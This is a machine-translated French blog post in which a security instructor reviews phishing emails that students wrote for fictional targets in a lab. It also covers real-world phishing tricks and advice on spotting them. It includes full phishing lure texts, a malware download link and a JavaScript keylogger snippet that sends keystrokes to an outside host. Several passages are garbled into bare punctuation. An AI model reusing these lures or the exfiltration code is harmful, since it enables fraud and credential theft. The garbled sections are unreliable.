Bonjour, Habr! Je suis l'éditeur de ce blog et j'enseigne parfois la virologie à l'université.

J'ai décidé de diversifier le processus éducatif et j'ai proposé plusieurs devoirs pour les étudiants de cinq ans - tels que la pratique et la pertinence, plutôt que d'écrire du code de 2003. L'une des tâches consiste à inventer et envoyer des lettres de phishing à des personnes fictives qui pourraient exister dans la réalité. Après tout, si vous ne savez pas comment attaquer, vous ne savez pas comment vous défendre, non?

Je vais montrer le meilleur de ce qui s'est passé: quelles lettres les escrocs pourraient envoyer au nom de Yandex.Argent, comment les étudiants se faisaient passer pour des services et pour le dessert - les méthodes que les escrocs utilisent actuellement (par exemple, plusieurs lettres reçues par nos utilisateurs vigilants).

Avertissement

Ne vous engagez pas dans le phishing. Formellement, c'est de la fraude, il est poursuivi en vertu de l'article 159.6 du Code pénal de la Fédération de Russie. Les travaux de laboratoire ont été effectués dans des conditions contrôlées, des lettres ont été envoyées dans des boîtes pré-préparées, dont l'accès n'est accessible qu'à l'auteur du message. Les étudiants sont avertis de toute responsabilité potentielle pour les envois de phishing hors du laboratoire.

Tous les personnages sont fictifs, toutes les coïncidences avec de vraies personnes et organisations sont aléatoires. Tous les logos, marques et noms appartiennent à leurs propriétaires respectifs.

J'ai déjà raconté une histoire similaire il y a un peu plus d'un an. Depuis, je suis devenu rédacteur en chef de l'habrablog. Au travail, je communique beaucoup avec différents départements, y compris le département de la sécurité de l'information. Toute l'entreprise, qui est logique en matière d'argent, aborde la sécurité en conséquence - le service de sécurité (SB) protège tout et tout le monde à l'intérieur, et empêche également les fraudeurs de tenter de commettre des crimes au nom du service.

Et puisque j'ai décidé de confier une telle tâche aux étudiants, je me suis demandé s'ils pouvaient en toute honnêteté retirer de l'argent fictif à des personnages fictifs. La motivation est importante ici - tout cela se fait uniquement à des fins éducatives, afin que les futurs spécialistes de la sécurité comprennent quelles menaces existent et comment s'en protéger.

Dramaturgie

Toutes les personnes sont différentes - avec une expérience différente, des connaissances informatiques et une foi différente dans les gens - j'ai donc proposé trois personnages et demandé aux étudiants de trouver une approche pour eux. Les restrictions étaient purement techniques - une lettre devrait être envoyée à la boîte aux lettres spécifiée, elle ne devrait pas être spam, et il devrait y avoir un moyen de collecter des données personnelles. Lesquels sont à la discrétion de l'étudiant.

La tâche de laboratoire complète est sous le spoiler.

Travail de laboratoire

      .  1.        .  napechata.li/form    ,    . 2. ,          . 3.       ,   .   ,  ,      ,    . 4.   —        (, , ,  ) ,      .       . 5.  ,        ,    .  .  (,   , )       . 6. ,   ,    . 7. ,      ,    .    : 1.     2.  ,        3.        4.        5.  ,

Valeria Valeryevna Golova, 31 ans, Ust-Kamenogorsk

Avocat au sein du cabinet d'avocats privé Soft Sign. Mail - odnagolowa@yandex.ru.

Valeria est un humaniste par nature, mais un technicien dans l'âme. Elle est diplômée de l'Oust-Kamenogorsk College of Information Technology et travaille en tant qu'administrateur système dans une entreprise privée de quatre personnes.

Valeria aime enregistrer des images de lampes sur les réseaux sociaux, a un blog sur LiveJournal, où elle partage ses rêves, et le dimanche elle va à des concerts gratuits, qu'elle trouve dans le groupe "Concerts gratuits d'Ust-Kamenogorsk".

Khusanboy Erdashevich Sotvondiev, 19 ans, Saint-Pétersbourg

Chauffeur de taxi dans la flotte de taxis "Timoshinsky". Courriel - husanboy7902301@mail.ru

Husanboy est venu à Saint-Pétersbourg d'Urgench, où il a travaillé comme chauffeur de taxi pendant 3 ans. Maintenant, il continue de faire de même à Saint-Pétersbourg sur l'ancienne Kia Rio, dont il a hérité d'un ami. Husanboy avait l'habitude d'enregistrer des morceaux de rap et de les publier sans pseudonyme, mais maintenant il ne fait que suivre de nouveaux artistes, il est donc inscrit sur tous les sites thématiques populaires.

Albert Mikhailovich Alberlive, 54 ans, Khabarovsk

Indépendant. Courriel - al.ber.live@outlook.com

Albert Mikhailovich a vu beaucoup de choses dans sa vie - il a envoyé des lettres à Mavrodi, chargé d'eau avec Kashpirovsky et était un agent de platine de Tiens avec un réseau de 22 personnes. Maintenant, il attend à nouveau sa retraite et, afin de ne pas perdre son temps en vain, il a décidé d'investir dans des bitcoins et du cashbury. Albert Mikhailovich a des profils sur tous les réseaux sociaux, des portefeuilles électroniques dans tous les services en russe et une incroyable confiance dans les gens et la technologie.

Envoyé

Cette année, les étudiants ont eu moins de temps - les premières lettres sont donc arrivées assez rapidement. Néanmoins, la plupart d'entre eux reflètent de véritables schémas de phishing que les étudiants ont trouvés sur Internet et ont essayé d'appliquer à l'état du problème.

Albert Alberlive

Honnêtement, ce personnage m'a le plus intrigué - que se passera-t-il, quelles lettres et de quels services volera? Pyramides financières, portefeuilles électroniques, crypto-monnaies? Les étudiants n'ont pas déçu - dans la boîte de réception, il y avait des lettres sur tous ces sujets des systèmes de paiement les plus populaires. Je veux tout montrer au point, mais, malheureusement, c'est impossible.

Phishing pour le compte de Yandex.Money

Tout d'abord, j'ai été intéressé par les lettres au nom de Yandex.Money.

Tous les étudiants qui ont envoyé des lettres au nom du service ont adopté une approche similaire - pour annoncer un nouveau produit qui vous évitera tous les problèmes et vous aidera à gagner de l'argent. Comme je le montrerai plus tard, cela ne correspond pas tout à fait au comportement réel des escrocs.

Permettez-moi de vous rappeler que toutes les applications officielles de Yandex.Money vivent dans une section spéciale sur le site Web de Yandex , et les annonces de nouvelles pièces en direct dans le service de presse . Vérifiez là-bas si vous voyez soudainement une annonce inhabituelle ou choquante sur Yandex.Money dans une source incompréhensible.

Voyons maintenant ce qui ne va pas avec ces lettres. Surtout pour cela, j'ai attrapé Natasha, la rédactrice en chef de Money, dans le couloir et montré des captures d'écran. Natasha sait tout sur la façon dont ils écrivent et n'écrivent pas dans Money, dont j'ai profité.

La question était simple: comment comprendre que cela n'a pas été écrit par nous? Je transmets le microphone:

Portefeuille Yandex.Crypto

Niveau supérieur: on ne sait pas pourquoi l'utilisateur reçoit même un e-mail à ce sujet; une lettre sur quelles crypto-monnaies sont généralement bonnes, mais comment elles peuvent être utiles pour moi n'est pas claire.

Selon le texte: points d'exclamation (nous n'en avons presque pas), employés de bureau au bureau (assurant la sécurité des transactions -) + négligence avec la typographie.

Yandex Rescue

- Nom + courrier en circulation.

- Incertitude: que signifie «compromis»? Eh bien, qu'est-ce que j'ai à voir avec ça?

- Encore une fois la chancellerie.

- Qu'est-ce qu'une «reprise confirmée», je voudrais savoir.

- Il n'y a pas d'en-tête de connexion + bouton (nous essayons généralement de faire en sorte que cette combinaison donne une idée générale de l'essence).

Support technique Yandex.Money

Tout est mauvais ici: des bagatelles telles que la conception négligente au message principal (pourquoi, sinon, le compte ne peut pas être restauré - c'est du chantage du chantage).

En général, résume Natasha, nous n'écrivons pas comme ça. Passons à d'autres exemples remarquables.

Lettres chaudes pour Albert

Nouveau mineur innovant

Progressez sans soucis.
Vous avez toujours voulu toucher le monde des crypto-monnaies, mais vous ne saviez pas par où commencer? Utilisez notre mineur lorsque vous n'utilisez pas d'ordinateur. Même le temps fonctionnera pour vous.
En avant.
Tout pour commencer dans un caprice http://clc.am/ \

Tout va bien dans cette lettre - il ne manque que le bouton normal avec un appel à l'action. Au lieu de cela, il y a un petit lien ci-dessous, qui ne clique toujours pas. En général, un échec complet de la cryptogénie potentielle sur le marché des crypto-monnaies.

Petits pains promis - ne faites pas d'efforts, tout fonctionne par lui-même, sans investissements. Eh bien, oui, bien sûr.

Plateforme de négociation d'investissement de nouvelle génération

Des commentaires sont-ils nécessaires ici?

Banque de photos de Banque de photos

Comment ajouter une lettre de solidité? Bien sûr, utilisez des photos de banques de photos. Il est surprenant que dans la même lettre, il n'y ait pas de personnes souriantes en costume d'affaires.

Valeria Golova

Valeria a envoyé de nombreuses lettres de LiveJournal, VK, de cours de rêve lucide, de sites avec des événements et même plusieurs messages de fans de son blog.

Lettres chaudes pour Valeria

Plateforme publicitaire

Apprendre ne s'arrête pas et se développe. Valeria s'est vu proposer de choisir des catégories de publicité - pourquoi ne pas profiter d'une offre aussi intéressante?

"Attacker" a essayé - le lien dans la lettre mène au site sur un hébergement gratuit, où dans les styles LiveJournal, ils ont dessiné un formulaire pour entrer des données personnelles et des informations de carte.

Il est très facile de ne rien soupçonner - mais vérifiez simplement la barre d'adresse. De plus, lorsque j'ai ouvert ce lien pour la première fois et entré une carte fictive, j'ai vu ce pop-up:

Ils ne vous préviennent pas en vain - le site est vraiment dangereux.

Ces "sites" d'hébergement gratuit ne durent pas longtemps et sont également remplis de filigranes. Et sur un hébergement payant (et avec un domaine de second niveau), vous pouvez envoyer une réclamation concernant le phishing et la fraude. Comme le montre la pratique, ces sites sont activement bloqués - par exemple, notre Conseil de sécurité envoie régulièrement des demandes aux bureaux d'enregistrement lorsqu'il détecte tout nouveau système frauduleux.

Application de bureau LiveJournal

Les gars n'étaient pas trop paresseux et ont même écrit une application de bureau - bien, bien fait. Même regarder des publications sans Internet foutu.

Le lien mène au fichier exe: http: //xxx.193.52.92/livejournal_desktop_1.0.3b.exe . Bien sûr, je ne le téléchargerai pas.

Avant d'installer des applications à partir de sources douteuses (et le courrier électronique est une source très douteuse), allez sur le site officiel et voyez s'il y en a. Et s'il y en a, installez à partir de là.

Extension de navigateur

J'aime mes élèves et ne limite pratiquement pas leur imagination. Cela conduit au fait que de telles lettres arrivent. Je l'apporte dans son intégralité - c'est tellement beau.

 > ,  .       "Your Favourite Song".    ,        -!        ,      ,      !             .         ,            ,  ,          ,        -   -.       -          ,   .      . > 1.    https://goo-gl.ru/OK   zip-. 2.  zip-    . 3.       . 4.    "   ". 5.   ,           keylogExten. 6.                . 7.   ! >  ,  "Your Favourite Song".

Ici, l'approche est la plus radicale qui ait été envoyée cette année. Par référence - raccourcisseur, qui redirige vers le stockage cloud. Il y a un enregistreur de frappe de navigateur, emballé dans deux archives. Il s'agit d'un simple écouteur d'événements qui s'exécute sur jquery, écoute les événements de keydown, collecte les codes en paquets et les envoie à un serveur.

 function sendSymOnServer(page, data) { var xhr = new XMLHttpRequest(); var body = 'page = ' + encodeURIComponent(page) + '&data = ' + encodeURIComponent(data); xhr.open("POST", 'https://requestb.in/1fa7izj1', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send(body); }

Naturellement, n'installez jamais d'extensions inutiles - en particulier celles qui ont un mot clé keylog dans leur description.

Écrire, couper

Comme l'année dernière, le copywriting brillant n'était pas sans. Pendant que j'écrivais cet article, il s'est avéré que quelqu'un d'autre était rédacteur publicitaire, et l'étudiant a pris le texte sur Internet.

À ce stade, toutes les bannières publicitaires contextuelles me montrent tout sur les rêves lucides. Et il vous semble aussi. Ne rends pas grâce.

Lettres de fans

Quant à moi, le type de phishing le plus dangereux. Un attaquant a repéré la situation et frappe des points sensibles - il peut être difficile pour tout le monde de faire face aux louanges, à la flatterie, à la reconnaissance et de ne pas commencer à répondre à un escroc.

Voici un exemple:

Bonsoir, Valeria.
Je m'excuse pour l'inquiétude, je m'appelle Dmitry, et tout d'abord je tiens à vous remercier pour vos messages chaleureux dans le magazine.
Je resterais probablement un lecteur silencieux, inspiré par votre exemple, mais votre rêve d'hier ne me quitte toujours pas.
Il m'a rappelé le travail d'un talentueux artiste visionnaire du nom de Freudun Rassuli et, dans une plus large mesure, sa peinture "Journey Home".
Comme chez vous, le thème de l'unité cosmique est proche de cet artiste: il était sûr que toute création est le produit de la synchronisation de nos énergies avec l'Univers.
J'ai pensé qu'il serait intéressant pour vous de vous familiariser avec son travail plus en détail, j'ai donc sélectionné la plus sophistiquée et la plus profonde de ses œuvres.
Malheureusement, je ne peux pas les joindre tous en même temps, mais je peux vous offrir une archive avec ma propre sélection.
https://cloud.mail.ru/public/Bg6E/WKr64w
Je suis sûr que vous pouvez trouver parmi ces peintures étonnantes beaucoup de similitudes avec vos rêves. Et je pense qu'ils auront fière allure sur votre blog.
Cordialement
Votre lecteur habituel.

Le lien contient le fichier Figures.exe, dans lequel, bien sûr, il n'y a pas de dessins, mais il y a un enregistreur de frappe.

Et un autre fan:

 > ,  . >   ,   . >       .     .    ,     - ?                .        .      .      ""?         . >  , >  .

Sous le lien se trouve une autre forme d'autorisation dans LiveJournal sur un hébergement gratuit (au point - livejjournal). Il y a https, donc les navigateurs ne jurent pas, mais vous devez toujours regarder attentivement.

Antiphishing

Soit dit en passant, après les premières lettres, Yandex a envoyé une lettre expliquant comment distinguer les bonnes lettres des lettres des escrocs. Vigile.

Husanboy Sotvondiev

Les élèves ont bien compris l'esprit comique du devoir et ont envoyé des choses qui m'ont causé une gamme d'émotions allant du rire nerveux à la perplexité. En général, il me semble qu'ils ont fait du bon travail. Les personnages ont reçu des lettres de sites de rap, des amendes de portails des services publics, des lettres de compagnies de taxis (dont une seule portant le nom de "Timoshinsky") et, selon la tradition, plusieurs lettres personnelles.

Lettres chaudes pour Husanboy

Concours d'artistes rap inconnus

Tout d'abord, je me tourne vers des artistes rap inconnus qui sont venus sur cette page pour participer au concours.

Yo les gars, ne réagissez jamais à de telles lettres, cela n'a aucun sens.

 >  ! >   .    - .        ,     .                6 .                .               .      ,        /       ,   /  ,        ,      .

Si vous avez pu lire ce texte sans jamais sauter les yeux, dites-nous ce qu'il y a. Le lien après la lettre mène à une forme Google de 30 champs (éléphant de Troie!), Dont les plus notables sont:

Mot de passe de connexion.
Programmes utilisés lors de la création (enregistrement) de la piste *.
Courriel / liens dans les réseaux sociaux d'employés susceptibles d'être intéressés par la direction du hip-hop *.
Nom complet les employés qui pourraient être intéressés par le hip-hop *.

N'entrez jamais sur les sites inconnus des noms complets d'employés qui pourraient être intéressés par la direction du hip-hop.

Antivirus Sotvondiev

Bon après-midi
Dans le cadre du durcissement de la politique de traitement des données personnelles dans notre flotte de taxis, tous les employés doivent utiliser un outil de sécurité certifié.
En tant qu'outil de ce type, Kaspersky Endpioint Security a été choisi dans notre entreprise, qui dispose des certificats de conformité FSB SF / 019-3471 et FSTEC n ° 3025.
Vous pouvez télécharger les fichiers d'installation de cet outil via le lien suivant:
http://aes.s.kaspersky-labs.com/endpoints/keswin11/11.0.1.90/russian-2778/bb0e36ac/keswin_11.0.1.90_en_aes256.exe
La demande des employés de télécharger et d'installer Kaspersky Endpoint Security par eux-mêmes. A la fin du mois, lors de l'inspection programmée, les fonds seront activés par les spécialistes de notre département.
Département de la sécurité technique de la flotte de taxis "Timoshinsky".

Il est bon que les escrocs soient gênés d'utiliser des correcteurs orthographiques. Cela permet d'identifier l'hérésie dans la boîte de réception et de l'effacer sans la lire. Naturellement, le lien mène au mauvais endroit - mais aussi à l'exécutable.

Artistes de rap inconnus et où ils vivent

Cliquez plutôt sur le lien, regardez, et là ...

Cette équipe d'étudiants a décidé d'identifier comment attraper une personne sur le phishing. Ce n'est pas sans signification - une compréhension de la mécanique du processus est importante ici, alors j'ai compté avec le laboratoire, mais non sans hésitation.

Je le répète encore une fois - ne saisissez aucune donnée sur les cartes bancaires sur les sites non vérifiés.

Tournage dans un clip de rappeur

Je pars, déterminé à jouer dans la vidéo, et là:

> Erreur: ce compte a été suspendu.

Détails sur le propriétaire du compte:
Nom: Phishing détecté
Identifiant:
Courriel: rap.ruXXXX@gmail.com

Comme vous pouvez le voir, les services combattent le phishing avant même que j'en parle sur Habré. Par conséquent, j'ai appris ce qui se trouvait sur le site uniquement grâce au rapport. Une autre fois, je parlerai de la façon dont je reçois les rapports - c'est une grande histoire distincte.

Essai hystérique

Kia Center St. Petersburg rapporte que vous avez une chance unique de louer une toute nouvelle voiture Kia Quoris. Il s'agit d'un tout nouveau modèle de classe affaires, avec un tout nouveau moteur et un système de suspension et de transmission repensé. Et surtout, vous obtenez une opportunité sans précédent d'obtenir cette voiture pendant un mois !!! Pour un usage personnel !!! Conduisez-le en ville, essayez de longs trajets, évaluez la qualité et la fiabilité de notre nouvelle voiture!

Même dans la lettre, il y avait une belle photo avec cette voiture et un lien vers un formulaire en ligne pour recevoir différentes informations.

L'élève a également utilisé des informations selon lesquelles le personnage conduisait la voiture d'un ami et a alimenté l'intérêt de la victime potentielle du fait qu'il ne restait que 3 voitures. En général, il est temps de courir, de vous dépêcher et de vous inscrire à un essai routier gratuit.

Et il vaut mieux se rappeler qu’il n’ya rien de gratuit sur Internet, et ne pas se laisser berner par des lettres douteuses.

À quoi ressemble le phishing dans la nature

Tous les exemples ci-dessus sont le fantasme de mes élèves, et ils ne se rapportent à la réalité qu'en ce qu'ils peuvent tous être écrits et envoyés. Il est assez facile de se protéger - il suffit de vérifier attentivement les liens, de ne pas télécharger les fichiers superflus des pièces jointes et de faire attention aux fautes de frappe dans les textes. Et si vous n'entrez aucune donnée personnelle sur des sites obscurs, vous pouvez vivre toute votre vie et ne pas savoir comment c'est lorsque vous volez de l'argent ou prenez un microcrédit pour scanner votre passeport.

J'ai demandé à des collègues du Conseil de sécurité de montrer de véritables e-mails de phishing qui vivent actuellement dans la nature. Ce ne sont que quelques exemples qui montrent que les escrocs peuvent prendre des astuces très différentes pour obtenir votre argent. En fait, il y en a beaucoup plus, vous devez donc être prêt à tout.

Votre portefeuille est réapprovisionné

L'utilisateur reçoit un message indiquant que son portefeuille est réapprovisionné. Dans le commentaire sur le paiement, il y a un eye-liner publicitaire et un lien vers un site où vous pouvez prétendument gagner mille dollars par jour sans rien faire pour cela.

Il s'avère que les escrocs peuvent non seulement truquer de telles lettres. Le fait est qu'une lettre falsifiée avec une forte probabilité ne passera pas par le filtre anti-spam dans le courrier. Mais la lettre automatique du service, formée après un véritable micropaiement sur le compte, peut atteindre.

Le lien du commentaire mène généralement à un site où les gens essaient de prendre de l'argent relativement honnêtement à la population.

Votre adresse IP a été répertoriée

Une lettre prétendument du support technique de Yandex.Money. Vous savez déjà comment le distinguer du présent - grâce à Natasha.

Que se passe-t-il d'autre?

L'hameçonnage ne concerne bien sûr pas uniquement les lettres.

Un exemple de quelque chose d'autre que le lecteur de blog nous a envoyé. Imaginez - ceci est une publicité Instagram frauduleuse qui mène à un public frauduleux sur VK, ce qui conduit à un site de débarquement frauduleux avec des sondages frauduleux pour lesquels ils auraient payé de l'argent frauduleux.

Bien sûr, ils ne paient pas vraiment.

Ceci est une fausse annonce.

Cette chaîne a même la condition «envoyer un lien à 20 amis sur WhatsApp pour continuer». , .

- , « ?» ( , ) :

« 80000 , — . 150 ».

, , .

?

, .
, — , , .
— , , — . , .
, - , .
.
. , .
, . , - .
. .

, , , . , . .

Cordonnier sans bottes. Comment les élèves ont écrit des e-mails de phishing